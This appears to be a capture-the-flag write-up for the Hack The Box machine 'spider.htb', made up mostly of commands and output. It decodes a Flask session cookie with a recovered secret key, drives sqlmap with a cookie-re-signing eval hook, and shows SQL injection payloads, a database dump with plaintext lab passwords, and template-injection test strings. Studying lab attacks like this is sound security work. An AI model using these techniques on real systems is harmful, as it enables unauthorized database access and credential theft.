3 :80 sqlmap via flask cookie
Last updated
Last updated
Using
$ flask-unsign -d -c 'eyJjYXJ0X2l0ZW1zIjpbXX0.YV43Rg.q_4li1GrgkBKOQe7AbK6R24bxOo' -S 'Sup3rUnpredictableK3yPleas3Leav3mdanfe12332942'
$ flask-unsign --decode --cookie 'eyJjYXJ0X2l0ZW1zIjpbXX0.YV43Rg.q_4li1GrgkBKOQe7AbK6R24bxOo'
{'cart_items': []}
# last link on page talks about using sqlmap using flask session cookie
Using https://book.hacktricks.xyz/pentesting/pentesting-web/flask#sqli-in-flask-session-cookie-with-sqlmap
| > https://book.hacktricks.xyz/pentesting-web/sql-injection/sqlmap#evalUsing
# ran as it was got errors, then explored and realized its uuid (not uid).
$ sqlmap http://spider.htb/ --eval "from flask_unsign import session as s; session = s.sign({'uuid': session}, secret='Sup3rUnpredictableK3yPleas3Leav3mdanfe12332942')" --cookie="session=*" --delay 1 --dbs
[*] starting @ 17:28:59 /2021-10-06/
custom injection marker ('*') found in option '--headers/--user-agent/--referer/--cookie'. Do you want to process it? [Y/n/q] Y
[17:29:05] [WARNING] it seems that you've provided empty parameter value(s) for testing. Please, always use only valid parameter values so sqlmap could be able to run properly
[17:29:05] [WARNING] provided value for parameter 'session' is empty. Please, always use only valid parameter values so sqlmap could be able to run properly
[17:29:05] [INFO] testing connection to the target URL
[17:29:07] [INFO] testing if the target URL content is stable
you provided a HTTP Cookie header value, while target URL provides its own cookies within HTTP Set-Cookie header which intersect with yours. Do you want to merge them in further requests? [Y/n] n
[17:29:13] [INFO] target URL content is stable
[17:29:13] [INFO] testing if (custom) HEADER parameter 'Cookie #1*' is dynamic
do you want to URL encode cookie values (implementation specific)? [Y/n] Y
[17:29:18] [WARNING] (custom) HEADER parameter 'Cookie #1*' does not appear to be dynamic
[17:29:19] [WARNING] heuristic (basic) test shows that (custom) HEADER parameter 'Cookie #1*' might not be injectable
[17:29:20] [INFO] testing for SQL injection on (custom) HEADER parameter 'Cookie #1*'
[17:29:20] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[17:29:32] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[17:29:34] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[17:29:40] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[17:29:46] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[17:29:51] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[17:29:57] [INFO] testing 'Generic inline queries'
[17:29:58] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[17:30:03] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[17:30:07] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[17:30:12] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[17:30:29] [INFO] (custom) HEADER parameter 'Cookie #1*' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y
[17:30:54] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[17:30:54] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[17:31:18] [INFO] target URL appears to be UNION injectable with 1 columns
[17:31:21] [INFO] (custom) HEADER parameter 'Cookie #1*' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
(custom) HEADER parameter 'Cookie #1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 74 HTTP(s) requests:
---
Parameter: Cookie #1* ((custom) HEADER)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: session=' AND (SELECT 6878 FROM (SELECT(SLEEP(5)))Dspl) AND 'xliC'='xliC
Type: UNION query
Title: Generic UNION query (NULL) - 2 columns
Payload: session=' UNION ALL SELECT CONCAT(0x717a786b71,0x756e616e446a5651496b4662456159494656584b736d77776f554b57787a477867794e4e73644845,0x717a6a6a71)-- -
'
---
[17:31:29] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Nginx 1.14.0
back-end DBMS: MySQL >= 5.0.12
[17:31:36] [INFO] fetching database names
available databases [5]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] shop
[*] sys
[17:31:37] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 76 times
[17:31:37] [INFO] fetched data logged to text files under '/home/kashz/.local/share/sqlmap/output/spider.htb'
[*] ending @ 17:31:37 /2021-10-06/
---# -D shop --tables
[17:32:49] [INFO] fetching tables for database: 'shop'
do you want to URL encode cookie values (implementation specific)? [Y/n] Y
you provided a HTTP Cookie header value, while target URL provides its own cookies within HTTP Set-Cookie header which intersect with yours. Do you want to merge them in further requests? [Y/n] n
Database: shop
[4 tables]
+----------+
| items |
| messages |
| support |
| users |
+----------+
# -D shop --dump-all
Database: shop
Table: messages
[1 entry]
+---------+---------+-----------------------------------------------------------------------------------+---------------------+
| post_id | creator | message | timestamp |
+---------+---------+-----------------------------------------------------------------------------------+---------------------+
| 1 | 1 | Fix the <b>/a1836bb97e5f4ce6b3e8f25693c1a16c.unfinished.supportportal</b> portal! | 2020-04-24 15:02:41 |
+---------+---------+-----------------------------------------------------------------------------------+---------------------+
[17:34:56] [INFO] table 'shop.messages' dumped to CSV file '/home/kashz/.local/share/sqlmap/output/spider.htb/dump/shop/messages.csv'
[17:34:56] [INFO] fetching columns for table 'items' in database 'shop'
[17:34:57] [INFO] fetching entries for table 'items' in database 'shop'
Database: shop
Table: items
[6 entries]
+----+-------------+-------+---------------------------------------------------+-------------------------------------------------------------------------+
| id | name | price | image_path | description |
+----+-------------+-------+---------------------------------------------------+-------------------------------------------------------------------------+
| 1 | Chair | 1337 | stefan-chair-brown-black__0727320_PE735593_S5.JPG | This is a beautiful chair, finest quality, previously owned by Mitnick. |
| 2 | Black Chair | 1337 | martin-chair-black-black__0729761_PE737128_S5.JPG | This is the same as the other one but in black. |
| 3 | Chair | 1337 | stefan-chair-brown-black__0727320_PE735593_S5.JPG | This is a beautiful chair, finest quality, previously owned by Mitnick. |
| 4 | Black Chair | 1337 | martin-chair-black-black__0729761_PE737128_S5.JPG | This is the same as the other one but in black. |
| 5 | Chair | 1337 | stefan-chair-brown-black__0727320_PE735593_S5.JPG | This is a beautiful chair, finest quality, previously owned by Mitnick. |
| 6 | Black Chair | 1337 | martin-chair-black-black__0729761_PE737128_S5.JPG | This is the same as the other one but in black. |
+----+-------------+-------+---------------------------------------------------+-------------------------------------------------------------------------+
[17:34:58] [INFO] table 'shop.items' dumped to CSV file '/home/kashz/.local/share/sqlmap/output/spider.htb/dump/shop/items.csv'
[17:34:58] [INFO] fetching columns for table 'users' in database 'shop'
[17:34:59] [INFO] fetching entries for table 'users' in database 'shop'
Database: shop
Table: users
[9 entries]
+----+--------------------------------------+------------+--------------------------------------+
| id | uuid | name | password |
+----+--------------------------------------+------------+--------------------------------------+
| 1 | 129f60ea-30cf-4065-afb9-6be45ad38b73 | chiv | ch1VW4sHERE7331 |
| 2 | 39643204-192c-4bb8-88d2-61dc81de7510 | kashz | kashz |
| 3 | <blank> | hzx"zxc | ddb8ef28-a54a-4da1-b734-f5eff7af2c0f | #"
| 4 | a7e52b68-53d2-4cf2-b072-6aff45d7d31c | ${7*7} | kashz |
| 5 | bb731ee3-c354-46ea-93ad-ce05d99f1f29 | {{7*7}} | kashz |
| 6 | 4459e9dc-f87d-45c8-a0e2-f4480f4a6398 | {{7*7}} | kashz |
| 7 | d8a9109b-4ff2-46e1-bc85-4e77c2ca0c35 | {{10*10}} | kashz |
| 8 | b3d3c283-26c8-4d4a-b7c0-cf1fc000f7bb | {{7*'7'}} | KASHZ |
| 9 | 4480d8e5-eda9-4053-be22-e807f716a45a | {{config}} | kashz |
+----+--------------------------------------+------------+--------------------------------------+
[17:35:00] [INFO] table 'shop.users' dumped to CSV file '/home/kashz/.local/share/sqlmap/output/spider.htb/dump/shop/users.csv'
[17:35:00] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 3 times
[17:35:00] [INFO] fetched data logged to text files under '/home/kashz/.local/share/sqlmap/output/spider.htb'
[*] ending @ 17:35:00 /2021-10-06/